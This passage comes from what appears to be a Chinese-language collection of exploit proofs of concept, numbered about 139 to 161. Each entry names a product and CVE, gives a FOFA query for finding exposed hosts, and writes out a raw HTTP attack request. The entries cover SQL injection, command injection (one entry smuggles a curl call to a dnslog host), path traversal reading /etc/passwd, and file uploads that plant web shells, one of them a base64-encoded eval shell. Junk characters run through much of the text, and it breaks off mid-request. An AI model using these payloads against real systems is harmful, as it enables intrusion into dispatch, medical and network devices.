2 [$ R- l1 n; \' R; r8 K2 F) vAccept-Encoding: gzip, deflate, br9 O" e* p5 f, Q& u4 X9 D
Connection: close
. l4 ]2 [! b( _, a+ z8 s" G/ h: HUpgrade-Insecure-Requests: 1
& V6 h- T8 y) _ T2 R/ {( _( x& Q y6 p R+ t
5 N. C6 ]% ^! F1 q139. 福建科立讯通信指挥调度平台editemedia.php sql注入
" y+ B0 y" z* Q0 u/ bCVE-2024-2622
; Z3 ?. k" I+ JFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
6 L, T `% z Z6 Y/ RGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
" d; \ k4 H, Y( R eHost: x.x.x.x3 M0 V$ S1 R$ R* }! R2 `/ \" a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: `- x, D: z1 w# D7 b0 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 F" X& S4 M+ U* ?/ j t fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 d1 H5 P' x8 VAccept-Encoding: gzip, deflate, br5 h! b( c" _, x- N; a7 i0 [
Connection: close/ X6 ^3 A" E! o
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk, }3 O: v! _8 i6 H
Upgrade-Insecure-Requests: 1& c4 f- r- B* }8 |
* d6 T6 G! M, ]/ \" i5 V$ o/ j. D4 U6 L, {5 k
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入* e3 t _8 L! C s( j- G+ W
CVE-2024-2566
- f* a4 o0 b8 `* G) c" sFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"( z0 n! k5 E0 C: d7 J
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1; d" d1 Q) T, s! |+ J6 m: W
Host: x.x.x.x" W: W2 C2 j R2 W8 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 ]* @/ u, E3 Z, [3 w) D L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 D* s1 u. k3 W. d x1 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 k* ~4 q5 i% M) P. ^
Accept-Encoding: gzip, deflate, br
" q& F6 @$ h# m( p* a I7 ?% _) dConnection: close
+ Y$ i, d- r# ICookie: authcode=h8g9. h/ A2 v, [: i! k4 t. q, n
Upgrade-Insecure-Requests: 1
$ ~% i7 S9 b4 e# m; w" @+ d2 Q
# W6 m+ b( C/ `! l1 X M' {+ G; p& x7 p
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
3 Y" V3 E* |0 RFOFA:body="指挥调度管理平台"; p) v" Z' t; \ O
POST /app/ext/ajax_users.php HTTP/1.1
) w2 f& \: V" t: O% C4 T8 ~5 Z8 XHost: your-ip
# q+ B, r+ L6 }2 Z0 Q* gUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info3 G# I$ ^- p f5 C* ~
Content-Type: application/x-www-form-urlencoded2 R8 _- s- K/ L3 f' V4 @2 \+ ?3 F
- p/ q4 R! K3 W L; p- J; a
% \5 \# j B v# g+ Q
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -! d; G- U( i& t3 u& n9 s) ?9 e$ z
( J- L m" I' x. {4 B( T. R- t% W# z( ?4 N
142. CMSV6车辆监控平台系统中存在弱密码% [3 P5 b) q3 E. X) L5 Q
CVE-2024-29666$ j" I- w" p4 |. x) p0 s
FOFA:body="/808gps/") M. f! {: b" B" B8 c
admin/admin
+ o( j* b: b) G2 ?, T- b) m143. Netis WF2780 v2.1.40144 远程命令执行
& |, [8 S! Q5 Q* V' f: g- jCVE-2024-258509 n+ ]# M5 b, c! B
FOFA:title='AP setup' && header='netis', Z1 R$ e/ D2 E5 p
PAYLOAD7 U- ^: h4 N+ u
. s K$ [. ~2 ~2 ^) |# J: P
144. D-Link nas_sharing.cgi 命令注入" Q0 I. k% W5 ?: n- p' a
FOFA:app="D_Link-DNS-ShareCenter"4 h4 P Y) C4 e# s
system参数用于传要执行的命令( U& |0 @2 g# R4 f; ^& u
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
9 r7 g M6 i }% u4 yHost: x.x.x.x0 I, N' A ?% L
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.08 }+ I! q/ P C
Connection: close
6 C6 {& B8 G- l5 d- S1 qAccept: */*7 Z" d- b$ n; h/ `8 h
Accept-Language: en
/ ?1 t! q! z( @Accept-Encoding: gzip w0 }/ {3 T- C: y. z' Z; I; N
. {8 u a, X- x- a
0 d( G- _! U( M' G- j4 U; R+ J
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
6 X% L, @1 N/ K7 YCVE-2024-34001 G6 z1 a6 Z2 B
FOFA:icon_hash="-631559155"# r% r) `$ D' e) G
GET /global-protect/login.esp HTTP/1.1
! M% \$ Y5 k8 z6 uHost: 192.168.30.112:1005
6 l: d- k! `( x5 y& A( TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84* k& @0 {/ k6 y' g. T2 R s
Connection: close
f6 X7 l: o/ p uCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
1 [) A/ ?$ \' ~# T8 fAccept-Encoding: gzip
3 b" O" Z( `/ g& g* L: Y7 s, ^% L7 O, g2 \* p: r; K# B
" D. r* T- j: X1 k; K
146. MajorDoMo thumb.php 未授权远程代码执行
t O# R& |6 qCNVD-2024-02175$ j* x! n3 B% U# F6 r' y# w6 q
FOFA:app="MajordomoSL". c3 q' Y- r; w7 N5 x
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
8 ]# a; C9 S, i* s8 f/ GHost: x.x.x.x
: Q) M0 G) Q$ Y# aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
2 m2 M _$ r6 f- V& g; vAccept-Charset: utf-8
6 K }8 q* Y( X; EAccept-Encoding: gzip, deflate
. T' \! m! {* C7 d9 wConnection: close$ z+ I% Y4 p* z
8 r: I% ?/ `4 S% d
7 S- F( }. q3 x* _7 y+ j% o147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
" k6 m' Q( y6 lCVE-2024-32399$ c9 A* ?$ ~0 u
FOFA:body="RaidenMAILD"
$ n9 @3 P# h0 G$ V/ m! N0 eGET /webeditor/../../../windows/win.ini HTTP/1.1
$ X# b9 V5 i! \. G2 v4 }Host: 127.0.0.1:81. |4 t1 x( [1 ?: Y" n* C
Cache-Control: max-age=08 j. k8 V, t: O& U0 C& |& W
Connection: close
7 K7 ^# s+ N, t0 |' f4 ~; K
+ W3 u# y2 R& S0 L: z* b* j
+ s4 X: R4 k3 a; |148. CrushFTP 认证绕过模板注入
1 J. d p) ?; \CVE-2024-4040
+ y2 y) S* z0 e# _FOFA:body="CrushFTP"
5 f& E; B. I) h' c, d2 yPAYLOAD
# O4 Q5 |% k) N# e3 h
w; E# S" P ^9 u9 Z149. AJ-Report开源数据大屏存在远程命令执行6 _, b2 a/ C* g4 `8 i$ U6 m
FOFA:title="AJ-Report"" P" l& x c( u* K9 J2 Q
7 b- Y5 M/ g0 D& L2 E8 s# J
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
- J% V9 r+ _- SHost: x.x.x.x1 u, R5 G, i9 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- I1 {$ |$ y, M0 U5 w7 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! E% X% }9 i' A* P3 d0 DAccept-Encoding: gzip, deflate, br
" f. X$ p8 B2 K/ c( EAccept-Language: zh-CN,zh;q=0.9' G! ^* T e7 H9 b
Content-Type: application/json;charset=UTF-8
2 R( u0 d2 f# O/ e8 mConnection: close
- J' m. ^. q f0 Y$ L
( ?" q Q3 [( F" S5 [{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
$ x0 v/ `! k3 `: O! U0 L
8 p5 J8 x& C+ [, E150. AJ-Report 1.4.0 认证绕过与远程代码执行
2 d2 R7 u; @' P vFOFA:title="AJ-Report"
9 x, k( F4 D$ E) U) }' E3 t# a2 [POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+ C- S# Q) o8 z! q7 V1 M/ dHost: x.x.x.x9 B% W, P( L0 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) Z. S. C! T7 Z: x1 I/ r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: J/ ^* S8 n0 y5 hAccept-Encoding: gzip, deflate, br
, e( {6 d6 L, F* f! zAccept-Language: zh-CN,zh;q=0.9
# w T+ R( U8 ^& MContent-Type: application/json;charset=UTF-8+ v. p1 H m2 `% x1 T' {4 e
Connection: close ^2 Z% z2 Y5 ?5 `) }8 ^% E7 m3 p
Content-Length: 339
5 J8 G# {$ S* j! X) L k) `
) {, Z+ I5 Q- f$ f& R/ s{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}* K' Z+ |4 c( v
9 d b; }! j2 E' S+ N
0 {! d) L) R" [! U/ D) U151. AJ-Report 1.4.1 pageList sql注入/ X$ R# R) g+ I3 U
FOFA:title="AJ-Report"( B0 T1 a2 n* L8 R: k0 p5 }
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
1 a+ x' k" f4 e7 [2 ]) U% d# aHost: x.x.x.x
5 I5 l( ]. }) w7 d+ k! _, f! dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 f* u2 k& h3 r- ~6 [7 @
Connection: close
% i3 g [/ y" h0 g, q- tAccept-Encoding: gzip
) W' b2 C( m7 t5 x6 H; q; Y; d' A$ i8 e7 E5 ~& \9 w( M
1 d4 c( X% T( x. y
152. Progress Kemp LoadMaster 远程命令执行
6 l% ]9 i x$ ]/ o7 p+ Q- c( O8 ]& sCVE-2024-1212+ I& x2 q* x1 e& |. F
LoadMaster <= 7.2.59.2 (GA)
" P5 u* m5 W' P, a. P2 ALoadMaster<=7.2.54.8 (LTSF)
: \7 J4 s' r- q$ E, KLoadMaster <= 7.2.48.10 (LTS)
6 y. R) z: K1 {6 L+ `FOFA:body="LoadMaster"
" D1 T% A; F; e5 n2 b% |9 ^' YJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
% P2 j6 X3 S& o! u( yGET /access/set?param=enableapi&value=1 HTTP/1.1
2 l" a8 H6 g/ R: hHost: x.x.x.x4 F, m6 O7 @- l% f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
1 c, V. U- D! X3 x5 dConnection: close
9 L4 e$ J$ @# lAccept: */*- H9 [/ J4 q. N0 [
Accept-Language: en7 M& @! C+ H4 K5 j2 }
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=4 K0 C, |4 D3 K8 J P/ Z+ P5 p
Accept-Encoding: gzip
; Q6 n3 H' M2 E, [( h* j4 |" n7 {) C3 @3 Z( [$ a
! F# Z9 r; G6 b4 r. r153. gradio任意文件读取
# A, G) }. x5 p4 m4 mCVE-2024-1561FOFA:body="__gradio_mode__"
& b8 x( g1 L+ W, ?( a第一步,请求/config文件获取componets的id
3 J' P0 k4 \6 u9 L9 q% s) F" shttp://x.x.x.x/config1 f5 @/ s; [/ r0 c
9 w9 i$ m6 _4 K* ^6 P5 [( `, C @% H7 W0 }. d+ Z
第二步,将/etc/passwd的内容写入到一个临时文件
! K, i( r- g, f( A4 V5 I/ xPOST /component_server HTTP/1.1
) ^1 _1 p- ~' ^4 RHost: x.x.x.x
3 E9 |; W& t! s8 n8 n' g) _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
) M5 j3 Z( [$ \8 K. g$ x; M6 x: J; ^7 WConnection: close
4 ~% N" e* w$ \) J# x& p+ R8 IContent-Length: 1158 |" M- l0 l2 i) m8 Q
Content-Type: application/json6 X$ y: n" e [: V$ q5 {3 {
Accept-Encoding: gzip+ w. O! |, @/ u. ~
- Z% c$ ]. @; g# K( b$ m
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}9 |0 b" r$ f/ h( `5 B$ F4 h" c
; D. `! C7 J3 X7 x
4 a+ z3 e) G9 I# g第三步访问
5 S0 c8 L, J$ K7 @( O7 whttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd! e# { M, J$ U$ a: X# C
+ W$ a9 G: |$ R w, g3 g+ ~, u+ Z
( L v& F; G( B4 Y154. 天维尔消防救援作战调度平台 SQL注入3 _! h+ R @; U% @
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"3 `% n& s0 Z, j1 I6 t# |; s' p; p
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
% H) F5 m/ S9 UHost: x.x.x.x0 Q5 i4 y+ F! f0 m/ T
Content-Length: 106 m1 p. r+ ~' Y7 v. M2 V; W
Cache-Control: max-age=0
: C! c' ?) Z3 ^ _! w/ CUpgrade-Insecure-Requests: 1' M# M6 X1 u# v( g+ M! f( Z; v- L
Origin: http://x.x.x.x$ q+ ~' ^7 h6 Y) v* E3 Q6 }
Content-Type: application/json$ _6 ?2 I5 o/ E; C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
3 b* q9 d2 [" J/ C9 c# P; f* {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& Z6 c4 H0 P5 q: s1 fReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
' e" j' d$ v1 v- U: @& jAccept-Encoding: gzip, deflate
/ P3 @1 h( E4 f# \Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7% Z; l9 `6 e7 x& k
Connection: close
% h7 Y* D) R. j3 [( v# e
9 o; T/ ?# M9 d0 [) v{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}( X4 `: ^$ S5 n: e5 s5 R8 U
* \ U! r5 _% j6 m( R# n K- j
8 A3 R8 f7 W: w+ j. a; c3 H* c155. 六零导航页 file.php 任意文件上传
" u0 n7 q' c5 FCVE-2024-34982$ c* j/ U% t e$ l8 O
FOFA:title=="上网导航 - LyLme Spage"1 v; @: ?- D! o! s6 j
POST /include/file.php HTTP/1.13 |- r9 `0 }4 d/ K
Host: x.x.x.x
3 ]/ T5 ]/ X, H4 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
( J. P4 n7 A- K/ cConnection: close7 b5 F/ B! A& h1 W2 j, u- ]
Content-Length: 232
% {2 f/ S$ I) X! T9 A. ]- W' IAccept: application/json, text/javascript, */*; q=0.01
. i8 `" h; C1 R HAccept-Encoding: gzip, deflate, br: {+ C1 Z) B0 M8 \7 `: ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ \1 v+ P& X7 V5 l6 J
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
, I* i, S- u6 hX-Requested-With: XMLHttpRequest! t/ K/ ^$ ]# o5 F5 i" R
2 H' a, O& E1 X) X8 O-----------------------------qttl7vemrsold314zg0f
7 X# b: d+ `9 V# W4 ]7 H! k7 aContent-Disposition: form-data; name="file"; filename="test.php"
2 w3 E9 I1 ?2 X7 _5 z' @Content-Type: image/png4 O# ^2 E% \: ~. P$ d6 I
2 @: |1 B$ u. q4 z+ c* [6 x
<?php phpinfo();unlink(__FILE__);?>$ }1 W) V6 t) E3 d) w5 ~5 U* @
-----------------------------qttl7vemrsold314zg0f--/ W. u) y8 O7 }6 w# q
5 R* e& g/ {/ o! {* a
. i7 t) d$ S/ i+ b3 V访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
3 R" q3 o1 i! n* b: O+ Z: y
+ q' U2 ?2 y7 v% B) R% x0 R( Z) y156. TBK DVR-4104/DVR-4216 操作系统命令注入
1 Z$ I; m. W; U, h E& m3 u: RCVE-2024-3721/ S/ ?. ^1 L, X0 q
FOFA:"Location: /login.rsp"! P6 s9 w" ]7 O
·TBK DVR-4104
% d& Y/ k# L/ L$ h% ?0 }. A·TBK DVR-4216
: \/ {; a( {& ^& r( `curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
! P0 j& z+ x Q% T/ w. R# k! t# q% _1 @( X2 [
+ G2 o& J$ \" |+ Q& G
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
- g; P3 b: @, x0 g: G! YHost: x.x.x.x
& f* N$ \( F$ m1 I& ]$ j6 [User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 n% f6 Q" i/ u: l# g2 f7 u9 ?! o$ D
Connection: close% s4 S3 f4 {: `2 a, F" ]0 F
Content-Length: 0
: I% O/ E3 H( ~. g4 l/ n; l; m% D9 ]Cookie: uid=1
# i7 _ G& ~6 v2 |0 aAccept-Encoding: gzip B/ U% K0 l1 W( Z8 B6 Q
6 D9 D; K4 X# e% ?: ^' M
4 P* c1 [: S9 V$ L157. 美特CRM upload.jsp 任意文件上传
; }/ S" y' x* C" K( A9 ICNVD-2023-06971* h: T) K' T+ D8 [: {/ [* v2 n
FOFA:body="/common/scripts/basic.js"7 y" o8 z0 }1 ?3 F. [, W. O0 c
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
& D( R+ f4 U/ g( J3 |+ X0 NHost: x.x.x.x
1 {# f( L# A: D$ C% tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36( w, Y! D7 I2 i, f2 S+ r
Content-Length: 709: Z9 W4 Z" k3 E' M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% d" h9 b/ R, P7 E `% v" ]( U& a
Accept-Encoding: gzip, deflate- W6 H+ e* o# W
Accept-Language: zh-CN,zh;q=0.93 [8 J f0 ~' t6 N" q8 t
Cache-Control: max-age=0& o" p( d6 H T) ]4 f4 D, Z! d p
Connection: close3 z+ a8 X2 p# q7 j( }. Y* w( Q4 U) i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN+ b9 C* E1 [% ~$ C& J$ l! B. M" y
Upgrade-Insecure-Requests: 1
+ |$ X& u4 D7 _; |2 A. a, Y- m5 I* t; s
------WebKitFormBoundary1imovELzPsfzp5dN
D; M! e( K6 @, c7 Z+ jContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp". m7 T! U C0 |) A
Content-Type: application/octet-stream
/ X2 R3 ~5 a5 I! E% k; m" ?" r* N: v) O6 i2 ]+ J% u" n) Y
nyhelxrutzwhrsvsrafb
) |3 {) w$ g4 L9 z------WebKitFormBoundary1imovELzPsfzp5dN
7 o$ D T2 v% q0 YContent-Disposition: form-data; name="key"5 p( W/ F+ y6 j, Q0 {3 ^
4 q8 H* ~% K' q0 I; W, Q
null
- F$ }3 W; R/ u- i3 F0 H9 v------WebKitFormBoundary1imovELzPsfzp5dN0 x- h1 c- x& _" W( u) {
Content-Disposition: form-data; name="form"; b7 G" n, N1 d1 f- {6 K% t
: \! E- [6 _3 h: N6 Onull0 Q3 D) X) I9 T3 c1 H
------WebKitFormBoundary1imovELzPsfzp5dN" u z( U) e) h- ?4 |
Content-Disposition: form-data; name="field" m4 Q/ @( D$ b3 p( ^
# V* h. q B( w& }" n* K- b7 H8 s
null$ `0 m& a1 C: j2 u7 ?
------WebKitFormBoundary1imovELzPsfzp5dN
3 W) s# t: E6 r& k) o! z0 dContent-Disposition: form-data; name="filetitile"
- P8 [5 G5 d9 ?: j# x7 u# f+ v3 J9 l5 D+ j( G. `3 j4 ]
null2 N) G P6 w# a) Y0 x+ i& {' c! z7 W
------WebKitFormBoundary1imovELzPsfzp5dN
6 _( y/ X& |- t5 V0 N9 KContent-Disposition: form-data; name="filefolder"& ~+ a& r/ S6 a8 H5 l
7 I+ v1 @2 y/ P
null# s& ~& c1 b: u
------WebKitFormBoundary1imovELzPsfzp5dN--
' n* r- K0 u- A( M k2 V! B' B3 U2 y3 u& e
/ H+ ?: F& _+ ~ E* I7 G! t' p/ jhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp4 M/ D( ? b* ^2 v9 f1 {! R- v6 Q
4 c u% _" j$ I/ l8 f) L
158. Mura-CMS-processAsyncObject存在SQL注入
# N ]; ]1 O" o, D" FCVE-2024-32640" a/ Z+ |6 W4 E. b: U0 a
FOFA:"Generator: Masa CMS"4 s/ D7 Y/ K4 ^+ a b' x, t
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1% ?3 ^! J7 Q! U3 x% W9 b/ k
Host: {{Hostname}}
3 K t* C1 R0 K( dContent-Type: application/x-www-form-urlencoded
/ I& o& R- ]. |4 t7 s; y! ]5 I! V5 j7 O K, U
object=displayregion&contenthistid=x\'&previewid=16 h) }0 N# G6 e* A
; y4 O$ ? m% s7 [
8 p9 M: L1 q7 Z9 d7 D159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传: B& {' O J) ]6 |! @* h
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")& c$ n, J J9 s1 C8 |* h; n: [
POST /webservices/WebJobUpload.asmx HTTP/1.1 A& P5 E0 ~+ W
Host: x.x.x.x9 R, u5 |/ ~! [8 X# {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36# s/ F" `" Q1 h
Content-Length: 10805 t# t5 H8 s, |
Accept-Encoding: gzip, deflate/ K, n2 y0 `! x! P9 n
Connection: close
. y, }" Z; Y8 ]# `& h& N# yContent-Type: text/xml; charset=utf-8; ?0 L" h l9 U8 J) B) s) |
Soapaction: "http://rainier/jobUpload"
% N2 E5 @6 X/ d- v0 p- s2 U, N8 K5 P+ K! n4 X" `9 v* `
<?xml version="1.0" encoding="utf-8"?>
' d" p3 J0 P5 b1 p! o) I4 V3 z<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' k7 A2 p% \! C2 Z @<soap:Body>
7 W3 w4 D8 u4 {7 B% f; l; D( @<jobUpload xmlns="http://rainier">1 |4 u2 b) H5 a0 g( w$ Y
<vcode>1</vcode>
! B8 H0 ]! s- L! k+ T1 w<subFolder></subFolder>
% h8 V+ r- y& X4 ?+ g/ p: Y<fileName>abcrce.asmx</fileName>
% S1 e& Q# [& c4 Z" W2 J' c/ N( {<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
; r- V! X# I1 o! |4 J/ K$ \" I</jobUpload>
) V9 W, `5 t0 P8 g+ ?! e5 k! C: W' a</soap:Body>
$ V* O6 }& s( _, b1 q/ ~* Z</soap:Envelope>& P1 a7 M! ?0 u; y, u
2 m& ^: Y& n* v0 S8 L5 r5 w+ A9 c3 T; G" \3 z' {
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
+ A5 E) o0 A! `0 Z! D) O$ S1 u3 y# B+ y. M' T" _
2 ]# \. L, e |
160. Sonatype Nexus Repository 3目录遍历与文件读取# N. Z6 U: U' m" u
CVE-2024-49560 t4 F6 T, K9 _: ]
FOFA:title="Nexus Repository Manager"7 ^1 v, l0 D; C" p" f" o
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
; O6 p- D5 n! r# ZHost: x.x.x.x' H1 L4 q5 G% D- R c5 K9 D H
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0) ~6 o2 s3 W9 @" |1 Z4 F
Connection: close
+ D9 Q; [' v" s3 TAccept: */*
' z. b5 C% @+ c' K/ O& T) _Accept-Language: en4 s/ l0 k D# B+ H( f
Accept-Encoding: gzip7 ?" Z1 ?( Y3 U3 V6 ~4 C9 o( J. d
0 |: ]( h* D0 _7 Q# e! f+ O6 ^& }% p
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传" h" w5 l: C* J) P
FOFA:body="/KT_Css/qd_defaul.css"* L2 y ]7 L* }; p9 S0 \: M0 g
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密4 S1 g, q) [! K$ V2 z) }; d: `' n
POST /Webservice.asmx HTTP/1.1
- b" F. z5 i2 g$ {Host: x.x.x.x+ @; \1 Q! o7 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
& r, E% A" J; j5 A; NConnection: close E0 n: O2 ^" O( \
Content-Length: 445$ I6 h: b3 t4 D: Z/ i( h3 q& U! S
Content-Type: text/xml+ [2 Y. p8 D2 D( E, @# Z; l2 A E
Accept-Encoding: gzip: s) v) o4 `! O4 c5 Z/ E
- H2 f. z- r5 |# h- s
<?xml version="1.0" encoding="utf-8"?>. z! N- o! A9 V9 m9 ]7 n. Y
<soap:Envelope xmlns:xsi="1 x3 o, G9 G! C4 i
